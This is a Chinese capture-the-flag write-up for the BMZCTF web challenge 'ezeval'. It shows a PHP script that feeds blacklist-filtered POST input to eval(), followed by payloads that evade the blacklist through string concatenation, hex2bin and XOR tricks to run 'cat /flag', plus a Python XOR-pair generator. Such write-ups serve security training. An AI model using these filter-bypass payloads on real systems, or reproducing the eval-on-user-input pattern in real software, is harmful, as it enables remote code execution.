BMZCTF-WEB-ezeval

<0|1>代码

<?php
highlight_file(__FILE__);
$cmd=$_POST['cmd'];
$cmd=htmlspecialchars($cmd);
$black_list=array('php','echo','`','preg','server','chr','decode','html','md5','post','get','file','session','ascii','eval','replace','assert','exec','cookie','$','include','var','print','scan','decode','system','func','ini_','passthru','pcntl','open','link','log','current','local','source','require','contents');
$cmd = str_ireplace($black_list,"BMZCTF",$cmd);
eval($cmd);

?>

<0|2>知识点

htmlspecialchars : 把预定义的字符转换为 HTML 实体
str_ireplace(find,replace,string,count)：从$cmd中匹配是否存在black_list中的函数，有的话替换成BMZCTF
eval:可执行$cmd传入的代码

<0|3>预期解答

绕过黑名单中的函数拿到flag

观察黑名单，常规的函数已经被过滤掉了

考虑使用

字符串拼接绕过

cmd=(s.y.s.t.e.m)('cat /flag');

进制编码绕过

cmd=hex2bin('73797374656d')('cat /flag');

异或绕过

脚本：

import string

char = string.printable
cmd = 'system'
tmp1,tmp2 = '',''
for res in cmd:
    for i in char:
        for j in char:
            if(ord(i)^ord(j) == ord(res)):
                tmp1 += i
                tmp2 += j
                break
        else:
            continue
        break
print(tmp1,tmp2)

cmd=('0000000'^'CICDU]')('cat /flag');

转：https://blog.csdn.net/mochu7777777/article/details/111916620

posted @ 2021-06-07 16:17 AsPwn 阅读(115) 评论(0) 收藏举报

刷新页面返回顶部

AsPwn

BMZCTF-WEB-ezeval

BMZCTF-WEB-ezeval

<0|1>代码

<0|2>知识点

<0|3>预期解答

公告